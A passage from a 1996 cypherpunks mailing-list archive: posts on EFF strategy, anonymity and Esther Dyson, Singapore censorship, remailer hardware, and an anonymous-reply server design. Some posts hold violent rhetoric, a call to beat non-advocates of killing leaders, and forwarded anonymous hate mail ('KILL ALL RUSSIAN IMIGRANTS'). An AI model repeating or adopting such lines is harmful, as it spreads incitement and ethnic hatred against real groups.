joint venture with RSA. Another lawsuit

pending against RSA, Security Dynamics,

and Cylink was brought by Roger

Schlafly, a cryptographic researcher who

is attempting to invalidate any and all

patents that might attempt to monopolize

public key cryptography.




Indeed, in a worst case scenario, what

Security Dynamics may have purchased is

a huge summary judgment (against itself)

should Cylink actually prevail in its

suits. According to Security Dynamics'

recent S-4 filing with the SEC, "RSA has

been advised that, in a letter to SDI

following the announcement of the

proposed merger, Cylink's general

counsel asserted that Cylink's

compensatory damages, conservatively

estimated, would exceed $75,000,000 but

provided no basis for such estimate."

That's the kind of negative return on

investment from an acquisition that

we've come to expect from America Online

(remember BookLink and WAIS Inc.?)!








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Wed, 4 Sep 1996 07:41:10 +0800
Subject: Re: rc2 export limits..
In-Reply-To: <c=US%a=_%p=Premenos_Corp%l=KI-960903173340Z-2@ki.premenos.com>
Message-ID: <199609031938.MAA26356@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! Hi,  Does anyone know the export limit for RC2 Key size ?  

Who cares?  We already know it isn't good enough, if it was,
the size or key would be illegal to export.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Tue, 3 Sep 1996 17:26:13 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Encourage Singapore To Come Out Of the Stone Age
In-Reply-To: <199609021945.MAA05327@dns2.noc.best.net>
Message-ID: <Pine.WNT.3.95.960903113229.-927943A-100000@stanley.ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Sep 1996, James A. Donald wrote:

> At 07:13 PM 9/2/96 +1000, James Seng wrote:
> > What i am saying is that Asian (Singapore)
> > values are _DIFFERENT_ from western (America) values.
> 
> One of the classic Greek rationalizations for slavery was that Asians
> are slaves by nature.
> 
> It would seem that you are saying that they were right.

Only if you assume that values depend on the nature, which James didn't
say. (Besides, Greeks didn't need to rationalize: slavery was part of
their society, not only in cities like Sparta based on a caste-style
social structure, but also in the "democratic" Athens. Aristoteles
shrugged off the whole issue saying that slavery would have been abolished
only if "machines could move by themselves": and the prophecy has proven
accurate indeed).

Back to the nature vs nurture issue: even though I usually agree with most
of what you say, I must disagree with your .Sig file:

> We have the right to defend ourselves   |   http://www.jim.com/jamesd/
> and our property, because of the kind   |
> of animals that we are. True law        |   James A. Donald
> derives from this right, not from the   |
> arbitrary power of the state.           |   jamesd@echeque.com

The idea that rights and values can be "natural" is contradicted by
several thousand years of history, during which absolutism or downright
tyranny have been well more common than freedom. 

The success of that misleading view in America, and by extension in most
of the western countries, is largely due to the unfortunate influence of
French rationalism over the founding fathers, as Hayek repeatedly noted. 
(A similar criticism of the theory of built-in values in Rousseau and his
followers, with emphasis on the ethical -as opposed to economic/
political- side, was moved by Nietzsche in "Human, all too human"). 

In the real world, freedom is a by-product of a materially prosperous
society (which is why capitalism generally produces free societies, but
socialism does not). Constitutional papers should spell what a society
guarantees to and what it expects from its members, not the (supposed)
nature of the latter. Trying to build a free society by screaming loud
what the "natural" rights are supposed to be, has no better chances of
success than trying to summon a god into existence by virtue of prayers. 

Enzo






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Wed, 4 Sep 1996 07:55:03 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609030615.XAA00596@eff.org>
Message-ID: <199609031953.MAA25374@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


[This post may be fwd'd to the CP list if it does not show up there from 
my sending it.]

Bill Stewart typed:

> While nobody's called Esther Dyson a Communist here yet, there are
> people on the board I disagree with - Mitch Kapor, in particular, has shown

who is no longer on the board

> signs of being a (gasp!) Democrat!  My initial reaction to the EFF's first

Democrat v. Republican is largely irrelevant here, though more relevant 
when you get into infrastructure, universal access, and intellectual 
property issues - stuff that EFF has touched on here and there, but which 
is not at the heart of our mission.  There are other democrats on our 
board and staff, as well as Republicans.  Even Kapor, however, is very 
strongly for competition, for entrepreneurs, for markets, and ergo 
differs from a lot of Democrats in that regard. And no one at EFF that I 
know of is an extreme liberal or conservative on social issues (both 
extremes are very censorious - the right of "ungodly" things, and the 
left of "un-p.c." things).  So, again, I'd like to suggest that political 
party affiliation is approaching meaninglessness. The political axis that 
counts isn't l. vs. r., but civil libertarian v. authoritarian. No one at 
EFF is an authoritarian.

> year or two was that they were doing some very good things 
> (the Steve Jackson defense),

That was quite a bit more than a year or two ago. :)

> and also had people making speeches about
> the need to provide everybody with access to the Information SuperHighway.
> Getting the S.266 anti-crypto-pro-wiretapping bill killed a few years
> ago was what convinced me to join them, though their compromise positions
> on some of the other anti-freedom bills since then have not helped
> my mixed views of the organization.  

There were no compromise positions. We have 100% opposed implementation 
of such legislation.  In the case of the Digital Telephony Bill (the 
later version of S.266, drafted by the FBI), we were simply unable to 
stop it, and instead had to try to strip as much FBI wish list out of it 
as possible and insert privacy protections.  That's not a compromise, 
that's emergency action. We did everything we could.

We are too, for numerous reasons.

> Maybe.  If it's a good position, it will recognize that anonymity
> is a mixed blessing; there are people who use it creatively and
> responsibly, like Black Unicorn and Lucky Green, and there are
> spammers who abuse it to the detriment of society, like the slimeball
> who used my remailer to post hatemail to the gay newsgroups with
> somebody else's name attached to the bottom.  On the other hand,
> free speech is also a mixed blessing; there _are_ things I wish people

Such a position is likely to be the one EFF takes if it takes one, which 
is probable.  EFF in generally does not issue extremist position 
statements, but is careful to examine the risks as well as the benefits, 
and look for pro-liberty solutions to those risks. 

> had the good taste not to say, but I'm not going to get in Voltaire's
> way while he defends to the death their right to say them...

Just as an aside, in case anyone's interested, what Voltaire actually 
said was, "I never approved either the errors of his book, or the trivial 
truths he so vigorously laid down. I have, however, stoutly taken his side
when absurd men have condemned him for these same truths."  The "defend 
to the death his right to say it" paraphrase is an embellishment. :)


--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Wed, 4 Sep 1996 05:18:55 +0800
To: Bruce Schneier <schneier@counterpane.com>
Subject: Re: What the NSA is patenting...
In-Reply-To: <v03007800ae517ef65df3@[204.246.66.135]>
Message-ID: <Pine.BSI.3.91.960903125712.21681B-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 3 Sep 1996, Bruce Schneier wrote:

> I just spent a pleasant hour or so searching a patent database for all
> patents assigned to the NSA.  There's some interesting stuff:
> 
> 	"Self-locking, tamper-evident package"
> 	Method of retrieving documents that concern the same topic"
> 

Oh Bruce, Bruce, Bruce,
Say it ain't so -- the NSA is trying to patent the

                   GUMMED ENVELOPE ???!

*NOW* I have truly seen everything.

-Millie.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Wed, 4 Sep 1996 08:21:00 +0800
To: Stanton McCandlish <unicorn@schloss.li (Black Unicorn)
Subject: Re: What is the EFF doing exactly?
Message-ID: <2.2.16.19960903152037.58cfc590@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:04 PM 9/3/96 -0700, Stanton McCandlish wrote:


>> I, unlike EFF, have never compromised my efforts to make strong crypto,
>> unescrowed strong crypto, and digitial communications, free from the FUD
>> spouted by government and media alike.  I, unlike EFF, have never
>> compromised my efforts to resist the expansion of a wiretap state.  I,
>> unlike EFF, have never proported to be a political represenative for these
>> positions and folded under the weakest of pressures like a reed.
>
>EFF has done none of that either.
>
>Compromise: 1. a settlement in which each side gives up some demands or 
>makes concessions. 2. a) an adjustment of opposing principles, systems, 
>etc., by modifying some aspects of each   b) the result of such an 
>adjustment. 3. something midway between two other things   4. a) exposure,
>as of one's reputation, to danger, suspicion, or disrepute   b) a 
>weakening, as of one's principles, ideals, etc.) as for reasons of 
>expediency.
>
>1 did not occur. EFF yielded nothing on any of the issues you mention.
>On Digital Telephony, which you clearly allude to, EFF opposed 
>implementation of the wiretapping provisions of the CALEA bill from start 
>to finish, and was instrumental in stripping most of them out, replacing 
>them with new privacy protections.  2 did not occur. Our mission remains 
>unedited from the day it was adopted, and EFF is just as committed to those
>principles now as ever.  We don't have a system, in the relevant sense, 
>as such.  There was no such adjustment, ergo no result of one.  3 does 
>not apply in any relevant sense (our steadfast assault against the CDA is 
>a "compromise" under such a definition because it was neither a total 
>victory, nor a total loss - yet I'm certain this is not the definition of 
>"compromise" that you intend).  4a is not relevant (that's the 
>security/secrecy-related definition, a nonsequitur in this context).  4b
>is simply a restatement of 2a - simply didn't happen.  Our results speak 
>for themselves on this.

Compromise is not necessarily a bad thing; without some give and take, we
sorta run right over each other. OTOH, I do agree that a strong position is
necessary at this juncture.

--
Jon Lebkowsky           http://www.well.com/~jonl              jonl@hotwired.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Wed, 4 Sep 1996 08:27:39 +0800
To: cypherpunks@toad.com
Subject: The Vincennes shootdown
Message-ID: <199609032039.NAA13681@well.com>
MIME-Version: 1.0
Content-Type: text/plain




FACT #1 The U.S.S. Vincennes was under attack by gunboats of Iraq's
        Republican guard at the time of the unfortunate incident.
        (All bets are off)

FACT #2 Intelligence believed the Republicican guard had it's own 
       version of the "Kamikazi."

Fact #3 If I was still a sneaky-ass airwarrior given the mission to 
        take out a vastly superior vehicle like an Aegis class    
        cruiser I would do one of the following:
        
        a) set my transponder to the I.D. of a commercial jet, and 
           do my best to fly like it's profile.
        
        b) turn my transponder off and "ride tail" (stay directly 
           under and behind the commercial jet, hiding in it's    
           radar sig) till I was within range.


        
Brian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Sep 1996 08:03:37 +0800
To: cypherpunks@toad.com
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <Pine.WNT.3.94.960903074503.-463081B-100000@enzohome.ima.com>
Message-ID: <NZXoTD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Enzo Michelangeli <enzo@ima.com> writes:

> I agree with what you say, and that's exactly why all this thread is out
> of focus. Blocking anything on the net is impossible, we know it and, I'm
> sure, the Singapore government knows it as well. The filtering proxies

Am I the only one to notice the striking similarities between the actions of
the SG gubment (kill kill kill) and the self-appointed censors who keep
inventing new classes of 'inappropriate' Usenet articles for which they
forge cancels? First they forged cancels for any materials which was
reposted too many times, then binaries cross-posted in non-binary
newsgroups (supposedly cross-posting wastews bandwidth), then any
articles with "cracking" information on breaking copy-protection...

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Sep 1996 07:54:27 +0800
To: cypherpunks@toad.com
Subject: Re: anon.penet.fi: URGENT REQUEST
In-Reply-To: <199609022129.OAA02339@myriad>
Message-ID: <05XoTD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ghio@netcom.com (Matthew Ghio) writes:
> $500 tops.  8MB is probably okay, 16 might improve resistance to mailbombs
> a bit tho.  You can get 486 motherboards for under $100 nowadays.
> Do the math: used 486 MB+CPU: $100
>                     16MB RAM: $150
>             case+powersupply: $50
>                     100MB HD: $20
FWIW, a very nice store in NYC called J&R (Park Row) is selling Digital
486 boxes for $600, including 16MB RAM, 540MB hd, and color monitor.
I also bought a 16MB thingie for my kid's 486 for $109.
>                HD Controller: $15
>       Dual 16550 Serial Card: $15
>               28800bps Modem: $150
I just got an internal 28.8Kbps modem (including fax) for $100.
>                              ------
>                               $500
> 
> And if you really want to run a remailer, I can sell you most of the above,
> and I'll even throw in a 340MB IDE HD with Linux+remailers preinstalled!
> (Yes, I'm serious.)

Are we talking about running a remailer over a dial-up UUCP, the way Julf did?
This box runs over dial-up UUCP on 14.4K modem, with two incoming feeds.
I may be willing to run a remailer to replace anon.penet.fi - let's discuss t
(It used to have an outgoing feed to Moscow, but not anymore. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Sep 1996 07:49:17 +0800
To: cypherpunks@toad.com
Subject: Re: The most ridiculous SPAM in my lifetime
In-Reply-To: <199609030322.WAA13140@manifold.algebra.com>
Message-ID: <BHyoTD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


geek@algebra.com (Computer Geek) writes:

> This is the American reincarnation of Ostap Bender.
> 
> Next spam from him will be about interplanetary chess congress,
> no less I am sure.

I'm sure the few cypherpunks who haven't read the Ilf&Petrov book all saw
the Mel Brooks movie (the 12 chairs) and recognized the cryptic reference.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Wed, 4 Sep 1996 01:22:45 +0800
To: cypherpunks@toad.com
Subject: Re: SNAKEOIL? Top Secret for Windows
Message-ID: <9609031259.AA24982@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain





DJ> From: frogfarm@yakko.cs.wmich.edu (Damaged Justice)
DJ> Subject: SNAKEOIL? Top Secret for Windows

DJ> http://www.simtel.net/pub/simtelnet/win3/security/tsecret.zip
DJ> ftp://ftp.simtel.net/pub/simtelnet/win3/security/tsecret.zip     12070 bytes

DJ> tsecret.zip     TOPSECRET!: Easily encrypts any file

DJ> TOPSECRET is a program to encrypt your sensitive files.  ............

DJ> Shareware.  Uploaded by the author.

DJ> Siva Krishna
DJ> sk510019@mail.idt.net

 
 
PA> I'm interested in reading the source
PA> code and any more detailed description you have.





SK> I am currently not releasing the source code.Here is a copy of the zip 
SK> file if you get hold of a pc.



 -- Peter Allan    peter.allan@aeat.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Sep 1996 08:09:08 +0800
To: cypherpunks@toad.com
Subject: Re:  Voting Monarchist?
In-Reply-To: <9609031057.AA17091@cow.net>
Message-ID: <a1yoTD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bovine Remailer <haystack@cow.net> writes:

> > Vote Monarchist
> 
> who is the candidate? LaRouche?

Harry Brone is a fucking statist.  If he weren't, he wouldn't be running
for president.  Anyone who doesn't advocate killing all kings, presidents,
and prime ministers is a fucking statist and should be beaten to a pulp
with a rattan stick.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Sep 1996 08:36:06 +0800
To: cypherpunks@toad.com
Subject: Forwarded Mail
In-Reply-To: <199609031658.SAA01776@basement.replay.com>
Message-ID: <VaZoTD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From nobody@REPLAY.COM  Tue Sep  3 12:58:21 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Tue, 03 Sep 96 13:17:51 EDT
	for dlv
Received: from [194.109.9.44] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA23053 for dlv@bwalk.dm.com; Tue, 3 Sep 96 12:58:21 -0400
Received: (from replay@localhost) by basement.replay.com (8.7.5/8.7.3) id SAA01776 for dlv@bwalk.dm.com; Tue, 3 Sep 1996 18:58:19 +0200 (MET DST)
Date: Tue, 3 Sep 1996 18:58:19 +0200 (MET DST)
Message-Id: <199609031658.SAA01776@basement.replay.com>
To: dlv@bwalk.dm.com
From: nobody@REPLAY.COM (Anonymous)
Organization: Replay and Company UnLimited
Xcomm: Replay may or may not approve of the content of this posting
Xcomm: Report misuse of this automated service to <abuse@REPLAY.COM>
Subject: KILL ALL RUSSIAN IMIGRANTS

Return-Path: <cypherpunks-errors@toad.com>
To: cypherpunks@toad.com
Subject: Kill all "libertarians"
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 02 Sep 96 15:48:31 EDT
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
Sender: owner-cypherpunks@toad.com

>From nobody@REPLAY.COM  Mon Sep  2 12:26:36 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Mon, 02 Sep 96 15:42:57 EDT
	for dlv
Received: from basement.replay.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA18013 for dlv@bwalk.dm.com; Mon, 2 Sep 96 12:26:36 -0400
Received: (from replay@localhost) by basement.replay.com (8.7.5/8.7.3) id SAA11752 for dlv@bwalk.dm.com; Mon, 2 Sep 1996 18:26:28 +0200 (MET DST)
Date: Mon, 2 Sep 1996 18:26:28 +0200 (MET DST)
Message-Id: <199609021626.SAA11752@basement.replay.com>
To: dlv@bwalk.dm.com
From: nobody@REPLAY.COM (Anonymous)
Organization: Replay and Company UnLimited
Xcomm: Replay may or may not approve of the content of this posting
Xcomm: Report misuse of this automated service to <abuse@REPLAY.COM>
Subject: All russians are scum. No exceptions.

Return-Path: <cypherpunks-errors@toad.com>
To: cypherpunks@toad.com
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Comments: Dole/Kemp '96!
Date: Mon, 02 Sep 96 01:19:37 EDT
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
Sender: owner-cypherpunks@toad.com

jonathon <grafolog@netcom.com> writes:

> On Sun, 1 Sep 1996, James A. Donald wrote:
>
> > > I agree with what you are saying but not all polititions are that bad.
> > > You make it sound as if their are no politisions are for freedom of the
> > > net.
> > So who is the exception?
>
> 	Harry Browne  Libertarian Party Candidate.

Harry Browne is a fucking statist.  All politicians are scum.  No exceptions.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 4 Sep 1996 09:14:49 +0800
To: cypherpunks@toad.com
Subject: Re: The Esther Dyson Flap
Message-ID: <ae51ed8e04021004a294@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:40 PM 9/3/96, Duncan Frissell wrote:

>Everyone please take a deep breath.  Slow down.  Reread Esther's comments.
>Count to 10.  Notice that nowhere does she call for state action to outlaw
>anonymity.  She explicitly predicted a place for anonymity in her CFP'95
>talk (is it on the Net anywhere?).  We may disagree with her predictions of
>the future scope of anonymity or with her concerns about the risks of the
>practice but she has never called for State action.  She is discussing the
>problems she perceives with it.  That's all.

I certainly read her words, and don't need to be told to reread them just
because I take them to mean she supports anonymity less than many of us
would like.

As I said in my message to Chuck Thompson, I held off in criticizing her
"L.A. Times" words until I could get a better clarification of what she
said, precisely, what was taken out of context, and what she really meant
to say. When she spoke up and the result was just as ambivalent about
anonymity rights, this is when I wrote my first criticism of her views.

And I saw her CFP '95 talk. I've also read various of her other comments on
the Net, freedom, responsibility, and anonymity. Some of her comments:

* "Esther Dyson, President EDventure Holdings, Inc. said her work with the
Electronic Frontier Foundation was based on the assumptions that the
Internet will have a beneficial effect on society. "The longer I have been
at this, the more questions I have about these assumptions," she said."

(Perhaps Esther is finding the goals of the EFF--or at least the views of
the other board members--are not her goals.)

* "The second way to create friction is to create accountability, identity
and personality. "I would like to see a world where anonymity is not
illegal, but is
discouraged," Dyson said. "It has its place in life, but people should have
persistent identities.""

(Couple with other comments about possibly requiring traceability (albeit
with some legal protections), it sure does sound like her form of
"discouraged" would imply a role for government.)

* "This raises the issue of privacy. "I am looking at a notion of privacy
for the consumer, but less privacy for companies and public office holders
and
others in positions of responsibility," she said."

(Is this the direction the EFF is being taken in? Granted, these are her
comments, but surely the views of the Chairman of the EFF affect the
personality and direction of the organization.)

These quotes from: http://seicenter.wharton.upenn.edu/SEIcenter/panel3.html.

By the way, the Scientologists have also noted her views:

"Esther Dyson, member of the board of directors of the Electronic Frontier
Foundation and member of the National Information Infrastructure Advisory
Council, spoke on the anonymity issue at the fifth Computers, Freedom &
Privacy (CFP) conference in San Francisco. "I have a concern about the
spread of bad behavior on the Net," said Dyson. "Anonymity figures into
this, and I feel that it has proven to not be a positive factor. It breaks
down
the community which we are seeking to build, and could turn the 'big
cities' of the information infrastructure into a big cesspool."

"Remailers who facilitate anonymous postings are part of the problem. They
can act as conduits for those who seek anonymity as a way to act illegally
without getting caught; yet remailers are able to shield themselves from
responsibility or liability.

"Computer experts stress that anonymous users should at least be trackable
by the remailers -- and that ones who act unlawfully can easily put the
remailers at risk. Dyson noted that in self-regulatory schemes for almost
any part of the Internet, "visibility, not anonymity, would have a strong
place.""

(end quote, from "Freedom," at http://www.theta.com/goodman/hijack.htm)


>Remember she is from the soft left.  She is not a macho-flash radical
>libertarian like many of us.  Save the 155 MM howitzers for the armed
>opposition not for our allies.

I don't know what "macho-flash" means, but I reject the label.

And please spare us the "save the howitzers" comment. We talk about what
concerns us. As it happens, our political opponents don't read our words,
whereas a bunch of EFF board members apparently do, and so our criticisms
here may cause EFF to actually confront the issue of anonymity and decide
where they actually stand.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 4 Sep 1996 11:02:13 +0800
To: paul@fatmans.demon.co.uk
Subject: Re: Secure anonymouse server protocol: comments please
Message-ID: <9609032156.AA05838@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:24 PM 9/2/96 +0000, paul@fatmans.demon.co.uk wrote:
>The following is a very sketchy plan for a secure protocol for an 
>anonymous server which allows replies without storing a recipient 
>database in the clear.

Several people have talked about this sort of thing recently,
inluding William Geiger, Doug Floyd, and myself.
Lutz Donnerhacke's Jenaer Anonymous Service <anon@as-node.jena.thur.de>
actually implements it (send it mail saying "help".)
Rather than using a human-selected userid, it uses the
PGP keyid to make IDs like anon-1a2b3c4d@as-node.jena.thur.de.

>This system has 1 huge fault, we can encrypt a uses ID with the 
>servers public key to see what his ID in the encrypted database is 
>and therefore identify him, maybe we need two seperate server public 
>keys, and when IDs come in encrypted with key1 (the one it releases) 
>it decrypts with secretkey1 then encrypts with publickey2 (the one it 
>keeps secret)

If you encrypt the id using raw RSA and constant padding, this is a risk.  
If you encrypt it using PGP, which uses a random session key, it's not.
If you encrypt it using raw RSA and pad the id with a random nonce, it's
also no risk.  In the latter two cases, the encrypted material is different
every time, so you can't compare with previous messages.

The Jenaer nymserver avoids this by using a remailer approach -
you send an encrypted message with a Reply-To: header telling where
to send the accumulated mail (which may, of course, be another nymserver),
and it delivers it using mixmaster.  This frees you to send your pickup 
requests by anonymous remailer as well.  It's still not risk-free,
since if Bad Guys crack the remailer or force the operator to operate it
while they monitor it, they can see pickup requests, but it's far
more difficult to do that than to just steal the box, and there's
no database on the box that's useful to steal.  Lutz does recommend
chaining your Reply-To: to another nymserver, but it's already very secure.

I don't remember if he gets fancy and requires the pickup requests
to be signed by the key of the owner or not; the only difficulty with this
is the syntax of PGP, which is "fixed in 3.0".

Hal Finney has also suggested a system that, instead of delivering
anonymous email to the recipient, sends a message saying
"You have anonymous mail, receipt #123456.  Send back this ticket
to pick it up."  and you can extend the syntax to handle
automatic blocking requests and automatic deliver-everything requests.
This is fairly easy to extend for anonymous mailboxes
and datahaven code.  I've wavered between the delete-on-retrieval model,
which is fine for email and not very useful for samizdat,
or the delete-after-some-time-period-or-request model, which is useful 
for both but makes it easy for users to turn you into the local
pirate-warez-and-child-pornography server.  If you extend the model
and charge digicash for storage, it becomes a much cleaner solution.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Wed, 4 Sep 1996 11:36:05 +0800
To: jamesd@echeque.com (James A. Donald)
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609031557.IAA28466@dns1.noc.best.net>
Message-ID: <199609032202.PAA29704@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


> But we do not want legislation, so we do not want to help write legislation.
> 
> We want to delay legislation for as long as possible, for the longer the
> delay, the more the balance of power favors the net and disavors the pols.
> 
> Therefore the correct strategy is simply to attack any politician who shows
> any interest in legislating on our issues.
> 
> We have no friends on Capitol hill, and if we did have friends, it would
> still be necessary to denounce them as enemies.

I agree with the general sentiment behind this, but I think it may go a 
bit overboard. For example, it is worthwhile to support Pro-CODE and SAFE 
(the two crypto bills now floating around in Congress). On the surface 
they both appear to threaten the viability of the Bernstein, Karn and 
Junger cases, but in reality neither of these bills have a chance in hell 
of passage.  "What's the point then?", you may ask. They slow down the 
Administration, which is pushing *very* hard and fast to get GAK adopted 
internationally, and to get US software companies to knuckle in to GAK in 
exchange for slightly relaxed export controls.  Make a lot of noise about 
the bills, and you screw up the administration's plans, since they have 
to divert at least some energy to fending the bills off or they *will* pass.
You do that, but keep the legal staff working solely on the cases, and 
you have more breathing room to get the cases through the Supreme Court 
before it's too late. And, in the event you lose the cases, you still 
have slightly less than a chance in hell of getting one of the bills 
passed and salvaging *something*, or simultaneously or alternately, just 
deploying more crypto tech such as S/WAN (which EFF is committed to as of 
the most recent board meething), since the Adminstration has been slowed 
down.  The more tech deployment you have, the more irrelevant the 
Administration's noises are.

The point being: Don't let disgust of a process or thing deter you from 
milking that process or thing of all it is worth, provided you sacrifice 
nothing significant in the process.

It has to be a judgement call. On some other issues this tactic does not 
work. Any legislation about porn on the Net needs to be slammed down, 
because any such legislation will get gutted by theocrats and turned into 
a censorship bill, as an example.

Choose action based on careful thinking, not kneejerk reaction, that's my 
motto, for what it may be worth.

--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hans "Unicorn" Van de Looy <hvdl@sequent.com>
Date: Wed, 4 Sep 1996 01:26:13 +0800
To: hvdl@sequent.com (Hans "Unicorn" Van de Looy)
Subject: Re: Passive Trojan (was:Re: HAZ-MAT virus)
In-Reply-To: <9609030938.AA07849@amsqnt.nl.sequent.com>
Message-ID: <9609031310.AA11046@amsqnt.nl.sequent.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Wed, 4 Sep 1996 10:50:49 +0800
To: "James A. Donald" <stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: What is the EFF doing exactly?
Message-ID: <2.2.16.19960903171629.0b172268@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:22 AM 9/3/96 -0700, James A. Donald wrote:
>At 12:53 PM 9/3/96 -0700, Stanton McCandlish wrote:
>> EFF in generally does not issue extremist position 
>> statements, but is careful to examine the risks as well as the benefits, 
>> and look for pro-liberty solutions to those risks. 
>
>If the right to speak anonymously is an "extremist" position in the eyes
>of the EFF, then they are no friends of liberty.
>
>It is hardly an "extremist" position outside of such countries as Cuba,
>Iran, or China.
>
>It is the overwhelmingly mainstream position, not just among netizens,
>but when last heard, amongst supreme court judges and ordinary people
>in the street.

Not necessarily. The character of the anonymous speech is decisive. If you
use anonymity to cloak harassment, for instance, the anonymity (which
removes accountability) is a problem.  The accountability issue is real and
should be addressed, not evaded.


--
Jon Lebkowsky           http://www.well.com/~jonl              jonl@hotwired.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com (David M. Rose)
Date: Wed, 4 Sep 1996 13:07:14 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re:  Voting Monarchist?
Message-ID: <199609032306.QAA26604@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Dimitri, err, Dr. Vulis, or is that Dr. Nuri?,

Relax! The modern cure for hydrophobia is a great deal less painful than
what it was in the past


>Harry Brone is a fucking statist.  If he weren't, he wouldn't be running
>for president.  Anyone who doesn't advocate killing all kings, presidents,
>and prime ministers is a fucking statist and should be beaten to a pulp
>with a rattan stick.





